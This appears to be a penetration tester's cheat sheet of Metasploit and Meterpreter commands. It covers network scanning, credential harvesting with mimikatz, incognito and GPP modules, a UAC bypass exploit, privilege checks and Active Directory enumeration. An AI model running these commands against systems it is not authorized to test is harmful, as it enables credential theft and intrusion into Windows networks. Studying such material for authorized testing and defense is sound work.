Metasploit

Meterpreter 
Arp Scan 
run arp_scanner -r <iP>/24
Nmap
db_nmap -sS -A <IP> 
PortScan
run auxiliary/scanner/portscan/tcp
Application Info
run post/windows/gather/enum_applications
Credential Gathering 
run post/windows/gather/credentials/credential_collector
​
load mimikatz
wdigest
​
load incognito 
list_tokens -u 
Windows 
# Collect a load of info 
run winenum
​
# Show privs
run post/windows/gather/win_privs
​
# Run as 
use exploit/windows/local/run_as
​
# Bypass UAC
use exploit/windows/local/bypassuac_injection
AD 
# Enumeration ADSI
load extapi
help extapi 
​
adsi_computer_enum domainname 
​
# GPP 
use post/windows/gather/credentials/gpp

Last modified 2yr ago